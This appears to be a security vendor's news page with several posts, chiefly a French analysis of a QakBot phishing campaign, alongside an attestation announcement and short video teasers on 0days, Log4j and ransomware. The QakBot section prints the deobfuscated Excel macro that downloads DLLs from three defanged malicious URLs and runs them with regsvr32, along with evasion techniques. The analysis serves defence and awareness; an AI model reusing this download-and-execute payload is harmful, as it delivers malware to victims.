e-Xpert Solutions’ SOC Achieves ISAE 3000 Attestation.

e-Xpert Solutions’ SOC Achieves ISAE 3000 Attestation.

e-Xpert Solutions’ SOC Achieves ISAE 3000 Attestation.

We are proud to announce that we has obtained the ISAE 3000 attestation for its Security Operations Center (SOC), issued by Deloitte. This independent assurance confirms that the SOC operates with robust, continuously applied controls across critical domains, from governance and technical security to client isolation, access management, traceability, documentation, and operational quality.

What ISAE 3000 Means

Unlike typical certifications, ISAE 3000 requires auditors to verify real operational evidence—not just policies or intentions—any day within the past 12 months. The audit focuses on consistent, daily execution of controls, making this attestation a true reflection of operational excellence, not a one-time achievement. e-Xpert Solutions is currently the only SOC in Western Switzerland to hold this level of assurance.

The Scope of the Attestation

The SOC successfully demonstrated 19 critical controls, covering areas that matter most to CISOs:

  • Access governance: strict and traceable controls over user access
  • SOC/client isolation: verified and automated separation between internal and client systems
  • Monitoring and detection: advanced tools, including custom attack simulations and new IDS sensors
  • Operational quality and processes: resilient internal processes, continuous improvement, and thorough documentation
  • Traceability and recording: full visibility into all SOC and client activities

Achieving this required a combination of deep technical upgrades, rigorous process management, and meticulous documentation.

What This Means for you, Our Clients

For clients, the ISAE 3000 attestation provides an unprecedented level of transparency and assurance. It validates that the SOC doesn’t just define security practices—it executes them, maintains them, and proves them every day.

The Teams Behind the Achievement

This milestone would not have been possible without the dedication, expertise, and perseverance of the SOC team, supported by compliance, HR, technical, and management colleagues. Every individual’s contribution—from designing and implementing technical controls to ensuring documentation, reporting, and quality—was essential.

Thank you to all involved. This attestation reflects your work, your rigor, and your commitment to operational excellence.

[ VIDEO ] Course aux 0Days, au secours !!

[ VIDEO ] Course aux 0Days, au secours !!

[ VIDEO ] Course aux 0Days, au secours !!

Face aux 0Days, les équipes de cybersécurité sont bien souvent limitées et peuvent parfois se sentir démunies devant l’ampleur du phénomène qui ne fait que s’amplifier depuis ces dernières années.

Dans cette vidéo, notre expert Michael Molho, va vous donner 5 conseils pour atteindre un bon niveau de sécurité et vous aider à gérer au quotidien les 0days.

Recrudescence des campagnes de Phishing QakBot

Recrudescence des campagnes de Phishing QakBot

Recrudescence des campagnes de Phishing QakBot

Ces dernières semaines, le SOC At-Defense a observé une recrudescence de campagne de phishing Qakbot chez ses clients. Ces attaques utilisent la dernière version du malware QakBot existante (Version :403.549, campagne : 1647248933).
Une sensibilisation des équipes techniques et des utilisateurs finaux permet de réduire le risque d’une compromission par ce malware difficilement détectable par les mécanismes usuels de défense (filtre mail, Antivirus/EDR, etc.)

Description de la menace

QakBot est un trojan bancaire connu également sous le nom de QBot ou Pinkslipbot. C’est un malware répandu, actif depuis 2007, comportant de nombreuses variations suivant les groupes d’attaquants et les différentes campagnes. Ce malware est le plus souvent utilisé par des groupes criminels à des fins financières.
Une compromission par QakBot entraine généralement les actions suivantes :

Exécution du malware :
Sur le poste infecté des opérations de reconnaissances automatisées sont réalisées dès l’exécution du malware permettant de récupérer des informations sur l’utilisateur, ses droits, les groupes auxquels il appartient ainsi que des informations sur le système et les réseaux telles que le nom de la machine, la configuration IP, la liste des disques ou encore la table ARP.
QakBot charge ensuite des modules complémentaires permettant d’obtenir des informations plus sensibles comme les identifiants des comptes bancaires, les e-mails ou encore les mots de passes de l’utilisateur.
Lorsque le malware a récupéré suffisamment d’informations sur la cible, l’accès sur le système infecté est revendu à d’autres groupes d’attaquants. Ces groupes d’attaquants utilisent d’autres malware comme les ransomware pour chiffrer le système cible.

Communication avec les attaquants :
La connexion avec le serveur commande et de contrôle est effectuée à intervalle régulier pour diverses opérations. Parmi ces opérations on retrouve notamment :

  • La récupération de la dernière version du malware
  • L’exécution de commandes à distance
  • Le chargement des modules supplémentaires

La liste complète des adresses IP des serveurs est directement dans le code du malware et varie en fonction des campagnes.

Objectifs sur la cible :
L’accès ainsi obtenu peut ensuite être utilisé pour réaliser différentes actions sur objectif en fonction de l’environnement.

  • Cela inclus par exemple la récupération des mails du poste infecté
  • Le vol des cookies des navigateurs web
  • L’exécution d’un keylogger

Ces attaques peuvent également déboucher sur des exfiltrations d’informations sensibles ou des déploiements de ransomware visant à corrompre toutes les données de l’entreprise.

Vecteurs d’infections et défense évasions

Les différentes analyses des derniers cas recensés par le SOC At-Defense révèlent que le vecteur d’infection principalement utilisé par ce malware est le phishing email.
Nous avons observé deux méthodes permettant à l’utilisateur ciblé de récupérer le fichier malveillant Office depuis l’email :

  • Via une pièce jointe directement dans l’email
  • Via un lien vers une plateforme de partage en ligne (OneDrive, Mega, …)

Dans ces deux cas, le fichier Office est compressé dans une archive protégée par mot de passe et le mot de passe est inclus dans le contenu de l’email.
Ce type de technique permet de passer outre les mécanismes d’analyses des emails.

Exemple :

Le fichier Office extrait contient le code malveillant sous la forme de Macro, les extensions utilisées peuvent varier en fonction des campagnes (Ex : docm, xlsm, xlsb, …).

TTP

Les techniques, les tactiques et les procédures permettent de contextualiser les actions effectuées par les charges malveillantes sur un système cible. Elles permettent également de mettre en place des règles de détection sur les équipements de sécurité.

Tactic ID Name Description
Defense Evasion T1027 Obfuscated Files or Information QakBot XLM files are obfuscated and sheets are hidden.
Defense Evasion T1027.002 Obfuscated Files or Information: Software Packing Every binary and config is obfuscated and encrypted using RC4 cipher.
Execution, Persistence, Privilege Escalation T1053 Scheduled Task/Job QakBot creates tasks to maintain persistence.
Execution, Persistence, Privilege Escalation T1053.005 Scheduled Task/Job: Scheduled Task QakBot uses this TTP as a way of executing every time the malicious DLL.
Defense Evasion, Privilege Escalation T1055 Process Injection QakBot uses Process Injection to load into the memory some payloads.
Defense Evasion, Privilege Escalation T1055.001 Process Injection: Dynamic-link Library Injection DLL injection is used to load QakBot via rundll32 Windows utility.
Collection, Credential Access T1056 Input Capture QakBot collects credentials and sensitive data from the victim’s devices.
Discovery T1057 Process Discovery QakBot performs process discovery.
Discovery T1082 System Information Discovery QakBot obtains the list of processes and other details.
Discovery, Defense Evasion T1497 Virtualization/Sandbox Evasion Anti-VM and sandbox techniques are used to evade detection.
Discovery, Defense Evasion T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion Time-based evasion is checked during the malware run time.
Discovery T1518 Software Discovery A list of the installed software is obtained.
Discovery T1518.001 Software Discovery: Security Software Discovery Installed AVs and other security software are obtained.

Analyse approfondie

L’analyse suivante détaille la méthode permettant d’obtenir le cœur du binaire malveillant.
Le cas présenté ci-dessous est un fichier Excel au format XSLB récupéré sur OneDrive. Le fichier XLSB inclut des Macro v4 (XLM).
Ce type de macro permet d’exécuter du code directement dans les cellules du fichier Excel, exemple :

Dans notre cas le code n’est pas directement visible dans le fichier Excel car plusieurs couches d’obfuscations ont été ajoutées pour accroitre la difficulté d’analyse.
Dans un premier temps les feuilles Excel contenants le code malveillant sont cachées :

Ensuite, les lignes de codes sont coupées dans des sous-cellules :

Le code malveillant est reconstruit dans les cellules de « QQDQ à QQDQ7 » :

Le code final réassemblé est le suivant :

[QQDQ]=CALL(“Kenel32″,”CeateDiectoyA”,”JCJ”,”C:\Bduc”,0)
[QQDQ1]=CALL(“ulmon”,”URLDownloadToFilA”,”JJCCBB”,0,”hxxps://mustafaksoy.com/UMWPpecHvg/gmkox.png”,”C:\Bduc\xel1.dll”,0,0)
[QQDQ2]=EXEC(“regsvr32 C:\Bduc\xel1.dll”)
[QQDQ3]=CALL(“ulmon”,”URLDownloadToFilA”,”JJCCBB”,0,”hxxps://britcap.com/S4ABFgxnWO/gmkox.png”,”C:\Bduc\xel2.dll”,0,0)
[QQDQ2]=EXEC(“regsvr32 C:\Bduc\xel2.dll”)
[QQDQ5]=CALL(“ulmon”,”URLDownloadToFilA”,”JJCCBB”,0,”hxxps://autoplacasdilger.com.br/ECg8m6oX27/gmkox.png”,”C:\Bduc\xel3.dll”,0,0)
[QQDQ6]=EXEC(“regsvr32 C:\Bduc\xel3.dll”)
[QQDQ7]=RETURN()

Ce code télécharge et exécute 3 DLL malveillantes de QakBot.

Les DLL obtenues sont des binaires développés en Delphi incluant du code non utilisé par le malware.

L’objectif de ce supplément de code est d’accroître la difficulté d’analyse par les antivirus, car la grande majorité du code est légitime.

L’analyse des sections du code, révèle la présence d’une ressource non signée :

Cette ressource est chargée dynamiquement par la DLL puis déchiffrée à la volée dans une zone mémoire.

Le code malveillant injecté est ensuite exécuté.
Ce premier bout de code malveillant est utilisé pour créer un nouveau Thread. Le code malveillant est réinjecté et exécuté depuis le nouveau Thread.
La fonction dans le Thread vérifie si la machine est utilisée pour le développement du malware. Cette vérification est faite par la présence du fichier suivant :

« C:\\INTERNAL\\__empty »

Dans le cas où ce fichier existe le malware ne s’exécute pas. Cette fonctionnalité permet donc d’utiliser ce répertoire comme un « killswitch » du malware et ainsi éviter une contamination.
A ce stade nous disposons du cœur du malware QakBot, ce cœur varie en fonction des campagnes. Cependant le début est souvent le même :

1. Lancement d’un binaire légitime présent dans « C:\Windows\System32 », dans notre cas « explorer.exe ».

2. Création d’un thread dans un état suspendu dans le processus « explorer.exe »
3. Ecriture du code malveillant dans la mémoire du Thread distant du processus « explorer.exe »

4. Passage du thread en mode actif

Notre version ci-dessus créer une tache planifiée pour la persistance sur le système, ajoute des exceptions pour l’antivirus « Windows Defender », puis se connecte aux serveurs de commande et de contrôle pour signaler l’infection du poste.
Une fois les informations remontées au serveur de contrôle, le malware télécharge des modules supplémentaires sur le serveur de contrôle et les exécutes sur le système cible.
Le nombre de modules augmente et se complexifie au fil des campagnes.
Exemple des modules :

  • Collecte des informations sur la machine infectée
  • Collecte des informations d’identification : Identifiants Windows / Identifiants des naviguateurs web
  • Collecte des emails

Prévention et awareness

Le vecteur initial étant du phishing, les utilisateurs finaux jouent un rôle majeur dans la lutte contre cette menace.
Toutefois des actions techniques peuvent également être mises en place afin de réduire le risque de compromission.

Filtrage et analyse mail :
Il est difficile de se prémunir des mails propageant QakBot car les pièces jointes sont généralement chiffrées par un mot de passe ce qui empêche l’analyse dynamique. Il est cependant possible par exemple d’ajouter un bandeau d’avertissement lorsque l’email est reçu depuis l’extérieur de l’entreprise.

Sensibilisation des utilisateurs :
Les utilisateurs doivent être sensibilisés au risque de l’exécution des macros d’un fichier Office (Word, Excel…).
De plus les utilisateurs doivent être informés sur le risque de télécharger des archives (.zip, .7z…) chiffrées avec un mot de passe sur internet. Cette méthode d’envoi de malware est très connue et répandue car elle permet de contourner les dispositifs d’analyse antivirus présents au niveau de la passerelle mail.

Bonne pratique de sécurités :
Enfin l’application de bonnes pratiques de sécurités peuvent permettre d’empêcher, de bloquer ou de détecter et contenir l’attaque au plus tôt. Cela inclus par exemple l’utilisation d’un antivirus avec une composante EDR à jour ainsi que l’utilisation d’un SOC intégrant les derniers indices de compromissions.

Le SOC AT-Defense dispose de règles de détections efficace et éprouvée face à cette menace permettant une détection avant même la phase d’exécution.

[ Vulnérabilité #Log4J ] Formation, Synthèse & Information par nos experts.

[ Vulnérabilité #Log4J ] Formation, Synthèse & Information par nos experts.

[ Vulnérabilité #Log4J ] Formation, Synthèse & Information par nos experts.

Depuis jeudi 9 décembre, le tremblement de terre Log4j déclenche un vent de panique et de messages plus ou moins fiables dans notre quotidien professionnel.

Après quelques jours d’échanges avec nos fournisseurs, clients et partenaires, nous réalisons que cette crise est non seulement majeure mais surtout que son impact est encore mal apprécié.
Nos experts sont mobilisés 24h / 24h depuis vendredi dernier pour assister notre clientèle dans cette compréhension, l’élaboration de plan d’action et le développement d’outils logiciels de “threat hunting”.

D’où vient-elle ? Quels sont les composants impactés ? Comment se protéger ? Comment la détecter ? Que faire en cas de compromission ?
Autant d’interrogations auxquelles un de nos experts vous répond de la manière la plus claire et complète possible. Vous comprendrez notamment pourquoi les systèmes non exposés sur Internet sont concernés par cette attaque au même titre que les systèmes frontaux.

Conseils et recommandations sur une attaque ransomware.

Conseils et recommandations sur une attaque ransomware.

Conseils et recommandations sur une attaque ransomware.

Découvrez les conseils et recommandations de notre expert, Simon Thoores sur une attaque de ransomware.

Quelles sont les cibles ? Les méthodes utilisées ? Que doit-on faire en cas d’attaque ? Comment se protéger ?

en_GB